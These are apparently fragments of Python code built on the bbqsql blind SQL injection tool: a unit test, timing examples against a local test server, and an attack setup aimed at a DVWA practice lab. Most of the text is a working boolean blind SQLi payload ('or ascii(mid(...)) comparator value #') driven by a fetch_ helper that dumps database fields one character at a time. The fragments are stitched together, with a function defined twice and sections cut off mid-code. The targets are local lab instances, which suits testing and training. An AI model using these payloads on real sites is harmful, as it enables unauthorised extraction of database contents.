def test_frequency_technique(self): url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}') query = bbqsql.Query( "row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}", encoder=quote) b = bbqsql.BlindSQLi(url=url.q_string, query=query.q_string, method='GET', comparison_attr='size', technique='frequency_search', concurrency=1) results = b.run() self.assertEqual(results, test_data)
def fetch_(field, interact=False): sql = ('(%s limit 1 offset ${row_index:1})' if 'from' in field else '(%s)') % field query = bbqsql.Query( "' or ascii(mid(%s, ${char_index:1}, 1))${comparator:>}${char_val:0} #" % sql) b = bbqsql.BlindSQLi(url=url, query=query, method='GET', comparison_attr='status_code', **attack_config) if interact: if not b.error: try: ok = raw_input('Everything lookin groovy?[y,n] ') except KeyboardInterrupt: ok = False if ok and ok[0] != 'n': return b.run() print(b.error) else: return b.run()
''' #STATUS CODE BASED EXAMPLE url = bbqsql.Query('http://127.0.0.1:8090/error?${injection}') query = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote) bh = bbqsql.BlindSQLi(url=url,query=query,method='GET',comparison_attr='status_code',technique='frequency_search',concurrency=35) start = time() results = bh.run() stop = time() print "dumped db in %f seconds" % (stop-start) ''' #SIZE BASED EXAMPLE url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}') query = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote) bh = bbqsql.BlindSQLi(url=url,query=query,method='GET',comparison_attr='size',technique='frequency_search',concurrency=3) start = time() results = bh.run() stop = time() print "dumped db in %f seconds" % (stop-start) #TEXT BASED EXAMPLE ''' url = bbqsql.Query('http://127.0.0.1:8090/boolean?${injection}') query = bbqsql.Query("row_index=${row_index:1}&character_index=${char_index:1}&character_value=${char_val:0}&comparator=${comparator:>}",encoder=quote)
bbqsql.settings.PRETTY_PRINT_FREQUENCY = 1. bbqsql.settings.QUIET = False attack_config = {} attack_config['cookies'] = { 'PHPSESSID': sessid, 'security': 'low', } attack_config['technique'] = 'binary_search' attack_config['technique'] = 'frequency_search' attack_config['concurrency'] = 5 attack_config['menu_mode'] = False # prevent printing '\n'*100 # dvwa url = bbqsql.Query( 'http://localhost:9191/vulnerabilities/sqli_blind/?id=${dejection}&Submit=Submit', encoder=quote) def fetch_(field, interact=False): sql = ('(%s limit 1 offset ${row_index:1})' if 'from' in field else '(%s)') % field query = bbqsql.Query( "' or ascii(mid(%s, ${char_index:1}, 1))${comparator:>}${char_val:0} #" % sql) b = bbqsql.BlindSQLi(url=url, query=query, method='GET', comparison_attr='status_code', **attack_config) if interact: